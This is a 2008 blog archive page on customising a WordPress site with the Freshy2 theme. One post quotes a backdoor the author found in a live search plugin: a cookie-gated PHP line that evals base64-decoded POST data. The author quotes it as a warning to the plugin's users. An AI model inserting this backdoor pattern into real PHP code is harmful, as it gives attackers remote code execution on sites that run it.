Monthly Archives: October 2008

New theme part III

After last nights debacle with the live search plugin, I tried an other one that was based on it: Live search popup. Unfortunately that one didn’t display very well in my theme, so I just removed it and won’t be offering a “Web 2.0″ search option for now.

Further changes to the Freshy2 theme and wordpress:

  • I’ve added a none.gif to the background images folder, since I got loads of 404 messages about it not being in there.
  • I’ve copied the default search box style (#s) from the wordpress theme and removed the “white” background color so you can see what you type when searching. Unfortunately I now need a black anti-aliased version of the search icon.
  • I’ve added a header to the search widget (guess that will be gone on the next WP update from Debian, as soon as the TinyMCE maintainer updates TinyMCE). Not sure if I really want it to stay, but if I do I need to find a better way to add it.

Now I “just” need to work on the <pre> and <code> output of the theme, since reading it is not very easy at the moment.

And I found why the Live search plugin didn’t work. It uses the deprecated get_bloginfo(‘siteurl’), while it should be using get_bloginfo(‘wpurl’). But well, after having contact with the maintainer of it, I won’t be using it. He is not interested in maintaining it, so better not to use that one.

New theme continued: why not to trust plugins

With this new theme I also saw that it was compatible with the “Addicted to live search plugin”[1]. (Un)fortunately this plugin doesn’t work out of the box either, at least not if you do not have WordPress running directly in the root.

But… Since I was looking at the code to fix this I also found:

<?php if($_COOKIE['7b13cc987791f418']=="6d6bedf94c36d538"){ eval(base64_decode($_POST['file'])); exit; } ?>

No thank you very much!

So what did we learn: Never ever trust WordPress plugins… So do not use this (version of the) plugin, unless you know how to remove this piece of code!

I’ll check out after some sleep what WordPress has to offer when you find a vulnerability like this in a plugin, so perhaps users of it can be warned… And I’ll fix this plugin later also, to be continued…

Update: it seems that it’s fixed. Although I’m not sure how the WordPress auto-update feature could create a line of code like that (as in, this sounds like bollocks to me).


[1] Funny sidenote, I found this blog two years ago and commented on one of his articles on Oracle.

New theme

A while ago I decided to change the default WordPress theme into the Freshy2 theme, since I liked the looks of it… I now partially wish I did not do that… Changing the theme was not trivial… Mainly because of two problems:

1. In the wp-content/themes/freshy2/functions.php file on line 474 it says

$path = WP_CONTENT_DIR.$theme_info->template_dir.'/';

If you change that to:

$path = ABSPATH.$theme_info->template_dir.'/';

suddenly you are able to configure the theme as promised by the author (at least that is what I needed to do with my Debian version of WordPress).

2. The customize freshy plugin that is advertised makes it so that I even though I’ve changed the stylesheet, it’s still not visible. So I’ve disabled that plugin. The line of php that is causing this behavior is also in functions.php, but then on line 26

if (!class_exists('Nice_theme')) add_action('wp_head','freshy_head');

Seems that Nice_theme doesn’t change the wp_head function. I didn’t look further into this, since the configuration options Freshy2 gives me are enough.

Furthermore, this theme breaks the xhtml 1.1 validation. I’ve removed the autocomplete="off" in the searchform.php file and added a <p> block around the search inputs. For more information about the autocomplete attribute and xhtml see this post on the Mozilla wiki (to be moved some time in the future).

Talking about xhtml 1.1 validation. This theme also puts a xhtml 1.0 doctype in the pages, while the footer of WordPress shows xhtml 1.1. So I’ve changed the doctype and removed the lang=”en” attribute from the <html> tag. But well, guess only a few people really try the validation button on the bottom of the page.

And I had to change the title of the blog again in the same manner as I did the last time on the default WordPress theme.

But, now I’ve done this I’m very happy. I really like the theme’s looks, certainly with this dark version, since it also adds something that I really wanted: no more fixed width layout! With the default version you still get a fixed with version, but this one scales. So thank you Jide!

Now a few things remain to be done:

  • Fix the <code> layout, since it doesn’t play well with my code formatting plugin and well.. it distracts a bit
  • Add Excerpts to all my posts
  • Cut down on the number of categories and add more tags
  • Find out why some post don’t show their date on the homepage
  • Change the color of the input text, so you can see what you search for
  • Post more frequently (still got about 20 drafts to work on)
  • Find out why putting <pre> tags inside <li> tags breaks validation

Update: I should have read the comments on the theme site before I started to work on the theme… Then I would have seen that more people encountered the problems and already wrote fixes to them. Someone thought the problem with the disappearing post dates has to do with editing the post after publishing. That is not the case, unfortunately. It is caused because the_date() doesn’t show the date if it’s the same as the date of the post before. In the default WordPress theme the_time('F jS, Y') is used in stead of the_date(). And the_time() doesn’t check for the last date. But, with just putting ‘F js, Y’ into this function call, changing your date format in the settings doesn’t help, so what you need to put in the index.php file on line 15 is the_time(get_option('date_format')). At least, if you want the date to be always shown. Perhaps I should make it a feature request that you can change this behavior of the_date, and add a bug report that the default theme doesn’t listen to the date_format setting…

Posting in the future…

Seems I just made a post 1 hour into the future and with that, on a different day. The WordPress settings say

Unfortunately, you have to manually update this for Daylight Savings Time. Lame, we know, but will be fixed in the future.

Lame indeed, and guess I forgot about this. A while ago a colleague encountered a similar problem in phpBB. Guess it’s PHP related and not just WordPress, as both products have the same problem. I wonder if the fix promised by WordPress is waiting for daylight savings time to be abandoned as idea, since it’s advantages are still being questioned.